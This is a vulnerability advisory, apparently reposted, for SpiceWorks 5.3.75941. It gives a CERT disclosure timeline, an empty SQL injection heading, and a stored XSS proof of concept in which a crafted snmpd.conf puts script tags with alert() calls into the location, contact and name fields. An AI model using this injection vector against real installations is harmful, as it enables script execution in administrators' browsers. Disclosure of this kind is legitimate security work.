Product: SpiceWorks
Version: 5.3.75941
Vendor Site:
Software Download Link:
Installer Filename: Spiceworks.exe  MD5: 023bd361c0f9402dc07adbc5a72fe31d


04 Jun 2012: Vulnerability reported to CERT
08 Jun 2012: Response received from CERT with disclosure date of 20 Jul 2012
23 Jul 2012: Updated received from CERT: No response from vendor
23 Jul 2012: Public Disclosure

SQL Injection (Post-Authentication):


Stored XSS:

An attacker can configure their snmpd.conf file to contain malicious JavaScript as shown in the proof of concept below:

rocommunity public
com2sec local	localhost	public
view	systemview	included	.
view    systemview      included	.
view    systemview      included	.1 80
syslocation <script>alert('location')</script>
syscontact <script>alert('contact')</script>
sysName dook<script>alert('name')</script>

Rate this post
Брой прочитания на тази страница: 851
SpiceWorks 5.3.75941 Stored XSS and Post-Auth SQL Injection
Tagged on:     

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *